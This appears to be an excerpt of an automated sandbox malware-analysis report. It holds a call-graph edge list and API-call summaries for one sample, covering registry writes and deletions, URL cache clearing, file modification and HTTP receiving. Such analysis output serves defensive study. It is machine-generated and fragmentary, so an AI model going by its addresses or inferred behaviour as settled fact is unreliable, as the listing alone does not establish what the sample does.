calls 88883 6a6e282e _realloc 88882->88883 88884 6a6fd7eb ___ansicp 5 API calls 88883->88884 88885 6a6e288d 88884->88885 88885->88860 88885->88869 88887 6a6e25e3 88886->88887 88888 6a6e25f7 88887->88888 88889 6a6fe0d8 __wfopen_s 161 API calls 88887->88889 88889->88888 88893->88861 88894->88866 88896 6a6e3650 88895->88896 88897 6a6fde00 _sprintf 103 API calls 88896->88897 88898 6a6e281a 88897->88898 88898->88882 88900 bef4ca0 88901 bef4ca6 88900->88901 88903 bef4cc3 88901->88903 88904 beb1bcc GetClassInfoA 88901->88904 88905 beb1bfc 88904->88905 88906 beb1c25 88905->88906 88907 beb1c1b RegisterClassA 88905->88907 88908 beb1c0a UnregisterClassA 88905->88908 88914 be97c58 CreateWindowExA 88906->88914 88907->88906 88908->88907 88910 beb1c53 88911 beb1c70 
88910->88911 88915 beb1b10 88910->88915 88911->88903 88913 beb1c67 SetWindowLongA 88913->88911 88914->88910 88916 beb1b20 VirtualAlloc 88915->88916 88917 beb1b4e 88915->88917 88916->88917 88917->88913 88918 40a590 88919 40a5ab 88918->88919 88920 40a5b6 RegDeleteValueA 88919->88920 88921 40a5b4 88919->88921 88920->88921 88922 40f610 88925 40a370 FindFirstUrlCacheEntryA 88922->88925 88926 40a3cb 88925->88926 88927 40a3f0 DeleteUrlCacheEntry FindNextUrlCacheEntryA 88926->88927 88928 40a423 88926->88928 88927->88928 88929 412b10 88930 412b28 88929->88930 88931 412b3a 88930->88931 88933 420a30 88930->88933 88934 420a44 88933->88934 88935 449479 ShowWindow 88934->88935 88937 420a52 88934->88937 88935->88937 88939 42f5d0 88937->88939 88938 420a90 88938->88931 88940 42f5e2 88939->88940 88942 42f5a9 88939->88942 88941 42f62b ShowWindow 88940->88941 88940->88942 88943 42f63f 88940->88943 88941->88942 88942->88938 88947 42f750 88943->88947 88945 42f715 88945->88942 88946 42f72c ShowWindow 88945->88946 88946->88942 88950 42f769 88947->88950 88949 42f77d codecvt 88949->88945 88950->88949 88951 4200b0 RtlAllocateHeap RtlFreeHeap __amsg_exit RtlAllocateHeap 88950->88951 88951->88950 88952 42fd10 88955 41e140 _memset 88952->88955 88954 42fd2f 88956 41dd70 88955->88956 88957 41e1a1 DialogBoxIndirectParamA 88956->88957 88960 41e070 88957->88960 88959 41e1f7 88959->88954 88961 41e0a4 88960->88961 88970 4242b0 5 API calls codecvt 88961->88970 88963 41e0d3 88971 4242b0 5 API calls codecvt 88963->88971 88965 41e0e1 88972 4242b0 5 API calls codecvt 88965->88972 88967 41e0ef 88973 4467e5 __EH_prolog3 KiUserExceptionDispatcher ctype ~_Task_impl 88967->88973 88969 41e113 88969->88959 88970->88963 88971->88965 88972->88967 88973->88969 88974 bef1d34 88975 bef1d42 88974->88975 89022 bef1d71 88975->89022 89024 be9b6d8 88975->89024 88980 be94c80 11 API calls 88982 bef1fc7 88980->88982 88984 be94c80 11 API calls 88982->88984 88983 bef1da7 89042 be94fdc 88983->89042 88985 bef1fe2 88984->88985 
89022->88980 89025 be9b6e8 89024->89025 89026 be9b709 89025->89026 89051 be9b1e4 42 API calls 89025->89051 89028 beeba00 89026->89028 89029 beeba25 89028->89029 89031 beeba56 89029->89031 89058 bea0140 13 API calls 89029->89058 89052 be94cb0 89031->89052 89032 beeba4b 89034 be94cf4 11 API calls 89032->89034 89034->89031 89036 be94c80 11 API calls 89037 beeba7a 89036->89037 89038 be94cf4 89037->89038 89040 be94cf8 89038->89040 89039 be94d1c 89039->88983 89040->89039 89066 be92dec 11 API calls 89040->89066 89043 be94fed 89042->89043 89044 be9502a 89043->89044 89045 be95013 89043->89045 89047 be94d20 11 API calls 89044->89047 89067 be952a8 11 API calls 89045->89067 89051->89026 89053 be94cb4 89052->89053 89056 be94cc4 89052->89056 89053->89056 89059 be94d20 89053->89059 89054 be94cf2 89054->89036 89056->89054 89064 be92dec 11 API calls 89056->89064 89058->89032 89060 be94d48 89059->89060 89061 be94d24 89059->89061 89060->89056 89065 be92dbc 11 API calls 89061->89065 89063 be94d31 89063->89056 89064->89054 89065->89063 89066->89039 89068 446798 89069 4467a6 89068->89069 89071 4467ab 89068->89071 89070 4467d0 NtdllDefWindowProc_A 89070->89069 89071->89070 89072 4467be 89071->89072 89074 4466a5 __EH_prolog3_catch 89072->89074 89083 455e53 __EH_prolog3 89074->89083 89076 4466c0 89078 4466d7 89076->89078 89093 44a5b1 KiUserExceptionDispatcher task 89076->89093 89087 443bc6 89078->89087 89081 446757 89081->89069 89085 455e6d 89083->89085 89086 455ead 89085->89086 89095 44a5b1 KiUserExceptionDispatcher task 89085->89095 89086->89076 89096 445dcb 89087->89096 89103 447fb3 __EH_prolog3 89087->89103 89088 443bea 89089 443c01 89088->89089 89173 443aa3 89088->89173 89089->89081 89094 44662f 7 API calls 89089->89094 89094->89081 89097 455e53 task 2 API calls 89096->89097 89098 445ddf 89097->89098 89099 445de8 89098->89099 89178 44a5b1 KiUserExceptionDispatcher task 89098->89178 89102 443aa3 2 API calls 89099->89102 89101 445dfb 89101->89088 89102->89101 89104 447ffd 89103->89104 
89105 447fdb 89103->89105 89106 447fe9 89104->89106 89108 445e71 7 API calls 89104->89108 89111 44803a 89104->89111 89179 4473c4 89105->89179 89107 448027 89106->89107 89148 447ff1 89106->89148 89264 444710 KiUserExceptionDispatcher 89107->89264 89108->89111 89110 4481cf 89110->89088 89111->89148 89189 4446dc 89111->89189 89113 44856d 89117 4481b4 89119 4480fb 89119->89107 89119->89117 89121 448209 89119->89121 89122 448215 89119->89122 89123 4483d3 89119->89123 89124 448325 89119->89124 89125 4483a6 89119->89125 89126 448361 89119->89126 89127 4483e1 89119->89127 89128 4482e3 89119->89128 89129 4483f5 89119->89129 89130 448231 89119->89130 89131 4483b3 89119->89131 89135 44834b 89119->89135 89136 448539 89119->89136 89138 4481e9 89119->89138 89141 448319 89119->89141 89144 44820f 89119->89144 89119->89148 89152 44823f 89119->89152 89262 444710 KiUserExceptionDispatcher 89119->89262 89129->89144 89268 444710 KiUserExceptionDispatcher 89148->89268 89174 443ad4 CallWindowProcA 89173->89174 89176 443ab2 89173->89176 89175 443ae7 89174->89175 89175->89089 89176->89174 89177 443ac0 NtdllDefWindowProc_A 89176->89177 89177->89175 89180 447415 89179->89180 89185 4473e4 89179->89185 89181 455e53 task 2 API calls 89180->89181 89183 447424 89181->89183 89182 4473e8 89182->89106 89184 44742d 89183->89184 89276 44a5b1 KiUserExceptionDispatcher task 89183->89276 89184->89182 89277 446a0f 5 API calls 2 library calls 89184->89277 89185->89182 89269 442a86 89185->89269 89191 4446ee 89189->89191 89190 444706 89284 454fe9 89190->89284 89191->89190 89288 44a5b1 KiUserExceptionDispatcher task 89191->89288 89194 44470c 89194->89119 89261 444710 KiUserExceptionDispatcher 89194->89261 89261->89119 89262->89119 89264->89110 89268->89113 89270 442ac4 89269->89270 89271 442a96 89269->89271 89270->89271 89274 442b45 89270->89274 89273 442aa6 89271->89273 89282 44a5b1 KiUserExceptionDispatcher task 89271->89282 89273->89182 89274->89273 89278 44294e 89274->89278 89277->89185 89280 44295a 
89278->89280 89281 44296a 89280->89281 89283 44a5b1 KiUserExceptionDispatcher task 89280->89283 89281->89273 89285 454ff9 89284->89285 89287 454ffe 89284->89287 89289 44a5b1 KiUserExceptionDispatcher task 89285->89289 89287->89194 89440 be97034 89441 be9703f 89440->89441 89444 be94878 89441->89444 89443 be97079 89446 be948be 89444->89446 89445 be9493c 89445->89443 89448 be94afc 89445->89448 89451 be94b0d 89445->89451 89446->89445 89456 be94808 89446->89456 89461 be94a3c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 89448->89461 89450 be94b06 89450->89451 89452 be94b52 FreeLibrary 89451->89452 89453 be94b76 89451->89453 89452->89451 89454 be94b7f 89453->89454 89455 be94b85 ExitProcess 89453->89455 89454->89455 89457 be9481d 89456->89457 89458 be94853 89456->89458 89457->89458 89462 be96170 89457->89462 89466 be985d0 89457->89466 89458->89445 89461->89450 89463 be96180 GetModuleFileNameA 89462->89463 89465 be9619c 89462->89465 89470 be96404 GetModuleFileNameA RegOpenKeyExA 89463->89470 89465->89457 89489 be98564 89466->89489 89468 be985db VirtualAlloc 89469 be985f9 89468->89469 89469->89457 89471 be96486 89470->89471 89472 be96446 RegOpenKeyExA 89470->89472 89488 be9622c 12 API calls 89471->89488 89472->89471 89473 be96464 RegOpenKeyExA 89472->89473 89473->89471 89475 be9650f lstrcpyn GetThreadLocale GetLocaleInfoA 89473->89475 89477 be9663f 89475->89477 89478 be96546 89475->89478 89476 be964ab RegQueryValueExA 89479 be964cb RegQueryValueExA 89476->89479 89480 be964e9 RegCloseKey 89476->89480 89477->89465 89478->89477 89481 be96556 lstrlen 89478->89481 89479->89480 89480->89465 89483 be9656f 89481->89483 89483->89477 89484 be965c9 89483->89484 89485 be9659d lstrcpyn LoadLibraryExA 89483->89485 89484->89477 89486 be965d3 lstrcpyn LoadLibraryExA 89484->89486 89485->89484 89486->89477 89487 be96609 lstrcpyn LoadLibraryExA 89486->89487 89487->89477 89488->89476 89490 be98504 89489->89490 89490->89468 89491 6a6e1330 89492 6a6e1356 89491->89492 89493 6a6fde00 
_sprintf 103 API calls 89492->89493 89494 6a6e1366 RegOpenKeyA 89493->89494 89495 6a6e13ba RegSetValueExA 89494->89495 89496 6a6e1381 RegCreateKeyA 89494->89496 89498 6a6e14dd RegCloseKey 89495->89498 89499 6a6e13e7 RegSetValueExA 89495->89499 89496->89495 89497 6a6e1399 RegCloseKey 89496->89497 89500 6a6fd7eb ___ansicp 5 API calls 89497->89500 89501 6a6fd7eb ___ansicp 5 API calls 89498->89501 89499->89498 89502 6a6e140e RegSetValueExA 89499->89502 89503 6a6e13b3 89500->89503 89504 6a6e14f9 89501->89504 89502->89498 89505 6a6e1431 89502->89505 89505->89505 89506 6a6e143d RegSetValueExA 89505->89506 89507 6a6e1478 RegSetValueExA 89506->89507 89508 6a6e1455 RegCloseKey 89506->89508 89512 6a6e149f RegCloseKey 89507->89512 89513 6a6e14c2 RegSetValueExA 89507->89513 89509 6a6fd7eb ___ansicp 5 API calls 89508->89509 89510 6a6e1471 89509->89510 89514 6a6fd7eb ___ansicp 5 API calls 89512->89514 89513->89498 89515 6a6e1500 RegCloseKey 89513->89515 89516 6a6e14bb 89514->89516 89518 6a6fd7eb ___ansicp 5 API calls 89515->89518 89519 6a6e152f 89518->89519 89520 421020 89523 421060 89520->89523 89522 421051 89524 421085 89523->89524 89525 42108a _memset 89523->89525 89524->89522 89527 4210dd _strlen 89525->89527 89528 4210ef 89525->89528 89527->89528 89528->89524 89530 46c9aa _LocaleUpdate::_LocaleUpdate _strncpy _memset __mbsnbcpy_l 89528->89530 89530->89524 89531 4832ac 89532 4832ed 89531->89532 89543 466de2 89532->89543 89536 48335d 89537 483335 89538 483339 89537->89538 89563 44ac2d 89537->89563 89569 44a7e5 89537->89569 89574 466976 10 API calls 89538->89574 89544 466dee SetErrorMode SetErrorMode 89543->89544 89545 466dff 89544->89545 89575 454640 89545->89575 89547 466e0f 89548 44addb SetWindowsHookExA 89547->89548 89549 466e42 89547->89549 89548->89549 89549->89538 89550 407ef0 89549->89550 89559 44cfbb 89549->89559 89551 44cfbb 11 API calls 89550->89551 89552 407f01 89551->89552 89583 44e85f 89552->89583 89554 407f08 89555 407f1a _strlen 89554->89555 89556 407f2a 
89554->89556 89555->89556 89557 4428ed ctype 4 API calls 89556->89557 89558 407f54 89557->89558 89558->89537 89560 44cfc5 89559->89560 89588 44d34f 89560->89588 89561 44cfcf 89561->89537 89564 44abe7 89563->89564 89570 44a7f7 89569->89570 89571 44a811 PeekMessageA 89570->89571 89572 44a839 89570->89572 89644 44cd86 89570->89644 89571->89570 89571->89572 89572->89538 89574->89536 89578 454544 89575->89578 89577 45465e 89577->89547 89579 45454d 89578->89579 89581 454566 89578->89581 89579->89581 89582 44a5b1 KiUserExceptionDispatcher task 89579->89582 89581->89577 89584 44e886 89583->89584 89585 44e86c 89583->89585 89584->89554 89585->89584 89587 44a5b1 KiUserExceptionDispatcher task 89585->89587 89589 44d37c 89588->89589 89590 44d3b1 89589->89590 89592 44d0e0 __EH_prolog3_GS 89589->89592 89590->89561 89593 44d0f8 89592->89593 89594 44d197 89593->89594 89595 44d140 ConvertDefaultLocale ConvertDefaultLocale 89593->89595 89596 44d290 _memset 89594->89596 89598 44d288 89594->89598 89595->89594 89605 44c9fe 89596->89605 89598->89590 89607 44ca20 89605->89607 89697 6a6edf85 89698 6a6edff7 89697->89698 89699 6a6edf90 89697->89699 89701 6a6ee02d 89698->89701 89702 6a6edffd 89698->89702 89725 6a6f3359 89699->89725 89708 6a6edfd8 89701->89708 89744 6a6f4224 89701->89744 89704 6a6f3911 ctype 110 API calls 89702->89704 89707 6a6ee002 89704->89707 89712 6a6f4224 110 API calls 89707->89712 89715 6a6ee015 89712->89715 89719 6a6f443c 111 API calls 89715->89719 89721 6a6ee01c 89719->89721 89778 6a6f46ca 113 API calls ctype 89721->89778 89726 6a6f3fbd ctype 104 API calls 89725->89726 89727 6a6edf9d 89726->89727 89728 6a6f4906 SetErrorMode SetErrorMode 89727->89728 89729 6a6f3911 ctype 110 API calls 89728->89729 89730 6a6f4923 89729->89730 89780 6a6f30b8 89730->89780 89733 6a6f3911 ctype 110 API calls 89734 6a6f4938 89733->89734 89735 6a6f4955 89734->89735 89788 6a6f4780 89734->89788 89737 6a6f3911 ctype 110 API calls 89735->89737 89738 6a6f495a 89737->89738 89739 6a6f4966 
GetModuleHandleA 89738->89739 89740 6a6f4961 89738->89740 89855 6a6f3944 89744->89855 89747 6a6f443c 89748 6a6f3944 ctype 110 API calls 89747->89748 89750 6a6f4448 89748->89750 89749 6a6f44aa 89752 6a6f3911 ctype 110 API calls 89749->89752 89750->89749 89751 6a6f4473 89750->89751 89775 6a6ee03f 89750->89775 89868 6a6f0208 110 API calls ctype 89750->89868 89869 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89751->89869 89755 6a6f44b0 89752->89755 89863 6a6f3a5f 89755->89863 89756 6a6f448a 89870 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89756->89870 89759 6a6f4492 89871 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89759->89871 89761 6a6f44bd 89762 6a6f44d4 89761->89762 89761->89775 89874 6a7033ec 68 API calls 5 library calls 89761->89874 89762->89775 89763 6a6f449a 89779 6a6f0261 118 API calls 2 library calls 89775->89779 89778->89708 89779->89708 89812 6a6f2fbc 89780->89812 89783 6a6f30fe 89785 6a6f3105 SetLastError 89783->89785 89787 6a6f3112 89783->89787 89784 6a6fd7eb ___ansicp 5 API calls 89786 6a6f31b2 89784->89786 89785->89787 89786->89733 89787->89784 89789 6a6f3911 ctype 110 API calls 89788->89789 89790 6a6f479f GetModuleFileNameA 89789->89790 89791 6a6f47c7 89790->89791 89813 6a6f3029 GetModuleFileNameW 89812->89813 89814 6a6f2fc5 GetModuleHandleA 89812->89814 89813->89783 89813->89787 89815 6a6f2fde GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89814->89815 89816 6a6f2fd9 89814->89816 89815->89813 89818 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 89816->89818 89818->89815 89856 6a6f3911 ctype 110 API calls 89855->89856 89857 6a6f3949 89856->89857 89860 6a6ef572 89857->89860 89861 6a6f3fbd ctype 104 API calls 89860->89861 89862 6a6ee038 89861->89862 89862->89747 89864 6a6f3a76 89863->89864 89865 6a6f3a65 89863->89865 89864->89761 89865->89864 89866 6a6f39c8 ctype 4 API calls 89865->89866 89867 6a6f3a75 89866->89867 89867->89761 89868->89751 89869->89756 89870->89759 89871->89763 
89874->89762 89877 46b02b 89880 477ee0 89877->89880 89879 46b07c 89881 477f03 __CallSettingFrame@12 89880->89881 89884 4386f0 89881->89884 89882 477f07 __CallSettingFrame@12 89882->89879 89885 404700 codecvt 4 API calls 89884->89885 89886 438701 89885->89886 89886->89882 89887 6a6d2100 89888 6a6d213b 89887->89888 89889 6a6d2109 _strncpy 89887->89889 89889->89888 89891 6a6e0900 89889->89891 89892 6a6fde00 _sprintf 103 API calls 89891->89892 89893 6a6e09df CreateFileA 89892->89893 89894 6a6e0a16 89893->89894 89895 6a6e0a00 GetFileSize 89893->89895 89899 6a6fd7eb ___ansicp 5 API calls 89894->89899 89896 6a6e0a0f CloseHandle 89895->89896 89897 6a6e0a1d SetFilePointer ReadFile 89895->89897 89896->89894 89897->89896 89898 6a6e0a51 _memset 89897->89898 89901 6a6fde00 _sprintf 103 API calls 89898->89901 89900 6a6e0b5f 89899->89900 89900->89888 89902 6a6e0aa8 89901->89902 89903 6a6e0b0a SetFilePointer 89902->89903 89904 6a6e0b22 SetFilePointer 89902->89904 89905 6a6e0b38 WriteFile FlushFileBuffers CloseHandle 89903->89905 89904->89905 89905->89894 89906 407630 89907 407636 PeekMessageA 89906->89907 89908 407662 89907->89908 89909 40764c DispatchMessageA 89907->89909 89910 407660 89909->89910 89910->89907 89911 405330 90111 404f50 89911->90111 90113 404f5e 90111->90113 90112 404fc1 90212 404e60 90112->90212 90113->90112 90228 406bf0 90113->90228 90118 4049d0 _memcpy_s 90119 404fa3 90118->90119 90231 404ce0 5 API calls codecvt 90119->90231 90121 40503d 90123 404e60 18 API calls 90121->90123 90122 404fb9 90232 404e40 ks_exit 90122->90232 90127 40504e 90123->90127 90124 406bf0 15 API calls 90125 405006 90124->90125 90128 4049d0 _memcpy_s 90125->90128 90129 404e60 18 API calls 90127->90129 90130 40501f 90128->90130 90135 405066 90129->90135 90233 404ce0 5 API calls codecvt 90130->90233 90132 405035 90234 404e40 ks_exit 90132->90234 90134 4050d1 90136 404e60 18 API calls 90134->90136 90135->90134 90137 406bf0 15 API calls 90135->90137 90138 4050e1 90136->90138 90139 40509a 

                                                                                  Control-flow Graph: function at be96404 (graph edge list not reproduced)
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0BEF80AC), ref: 0BE9641F
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9643D
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9645B
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0BE96479
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0BE964C2
                                                                                  • RegQueryValueExA.ADVAPI32(?,0BE96684,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001), ref: 0BE964E0
                                                                                  • RegCloseKey.ADVAPI32(?,0BE9650F,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0BE96502
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0BE9651F
                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0BE9652C
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0BE96532
                                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0BE9655D
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965B2
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965C2
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965EE
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965FE
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0BE96628
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0BE96638
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                  • API String ID: 1759228003-2375825460
                                                                                  • Opcode ID: 9b04d7b3a3b6f3f40b17d4a987446cf22792c4e4905bb096f6d4f2af6646e097
                                                                                  • Instruction ID: e6b8a93130d5e53a57c3024fb1872645d81632baa3215dbd1ed6aea87bcb7a68
                                                                                  • Opcode Fuzzy Hash: 9b04d7b3a3b6f3f40b17d4a987446cf22792c4e4905bb096f6d4f2af6646e097
                                                                                  • Instruction Fuzzy Hash: 23619371E4020E7EEF10DBE8DC46FEFB7BC9B08704F405196AA04F6181D6B4DA588B61

                                                                                  Control-flow Graph: function at 6a6e4d60 (graph edge list not reproduced)
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncmp_swscanfrecvselect
                                                                                  • String ID: Content-Range: bytes $Content-Range: bytes %I64d-%I64d/%I64d$HTTP/$HTTP/%f %d $http://
                                                                                  • API String ID: 1488473753-4277459499
                                                                                  • Opcode ID: cbff3338ef556bbc404b4fb808700e9364ef7e4608b5aca104d69e1862ab248c
                                                                                  • Instruction ID: 8f3322be52fa15ce484bc363e55f1185bf11bf4487f505a54c33d59bf5f6d3bc
                                                                                  • Opcode Fuzzy Hash: cbff3338ef556bbc404b4fb808700e9364ef7e4608b5aca104d69e1862ab248c
                                                                                  • Instruction Fuzzy Hash: 37E1A0B160E7409FD360CF68C984A9BB7F5BBC5318F514A2DF19687281EB71E809CB52

                                                                                  Control-flow Graph: function at 6a6e0900 (graph edge list not reproduced)
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E09DA
                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 6A6E09F3
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 6A6E0A02
                                                                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 6A6E0A10
                                                                                  • SetFilePointer.KERNELBASE(00000000,-00000004,00000000,00000000,?,?), ref: 6A6E0A24
                                                                                  • ReadFile.KERNELBASE(00000000,?,00000004,?,00000000,?,?), ref: 6A6E0A47
                                                                                  • _memset.LIBCMT ref: 6A6E0A60
                                                                                  • _sprintf.LIBCMT ref: 6A6E0AA3
                                                                                  • SetFilePointer.KERNELBASE(00000000,-00000004,00000000,00000000), ref: 6A6E0B0C
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6A6E0B24
                                                                                  • WriteFile.KERNELBASE(00000000,?,00000004,?,00000000), ref: 6A6E0B39
                                                                                  • FlushFileBuffers.KERNEL32(00000000), ref: 6A6E0B40
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E0B47
                                                                                  Strings
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6A6E0924
                                                                                  • %c%c, xrefs: 6A6E09CE
                                                                                  • dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d, xrefs: 6A6E0A9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$CloseHandle_sprintf$BuffersCreateFlushReadSizeWrite_memset
                                                                                  • String ID: %c%c$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d
                                                                                  • API String ID: 1255100760-368882477
                                                                                  • Opcode ID: 761571c983ef2af7491e77ab2dcdcc4ae0171cfb712749f6324ccbae3ccbceda
                                                                                  • Instruction ID: c673641a34a6da2fe9895337e760508f6da8abbb3bb52265eb71ddaada7cdd40
                                                                                  • Opcode Fuzzy Hash: 761571c983ef2af7491e77ab2dcdcc4ae0171cfb712749f6324ccbae3ccbceda
                                                                                  • Instruction Fuzzy Hash: DB610C6110C3D05ED315DB748C84B6FBFE99FCA308F08492CF5D5D6182DA69CA098B67

                                                                                  Control-flow Graph: function at 6a6e3c40 (graph edge list not reproduced)
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 6A6E3D05
                                                                                  • _rand.LIBCMT ref: 6A6E3D16
                                                                                  • _memset.LIBCMT ref: 6A6E3D6A
                                                                                  • _memset.LIBCMT ref: 6A6E3E0D
                                                                                  • _memset.LIBCMT ref: 6A6E3E2A
                                                                                    • Part of subcall function 6A6E46C0: _memset.LIBCMT ref: 6A6E46F0
                                                                                    • Part of subcall function 6A6E46C0: _swscanf.LIBCMT ref: 6A6E4739
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6A6E3EA5
                                                                                  • gethostbyname.WS2_32(?), ref: 6A6E3EB3
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3EBF
                                                                                  • inet_ntoa.WS2_32(?), ref: 6A6E3EEE
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3F11
                                                                                    • Part of subcall function 6A6E39A0: _malloc.LIBCMT ref: 6A6E39D0
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                    • Part of subcall function 6A6F1951: __EH_prolog3_catch_GS.LIBCMT ref: 6A6F195B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Cleanup$Exception@8H_prolog3H_prolog3_catch_StartupThrow__time64_malloc_rand_swscanfgethostbynameinet_ntoa
                                                                                  • String ID: P
                                                                                  • API String ID: 3162985554-3110715001
                                                                                  • Opcode ID: cc4d28c8a6f7a50defdff56c37e41e414bbc04f38cbb21c955df2892dc812a89
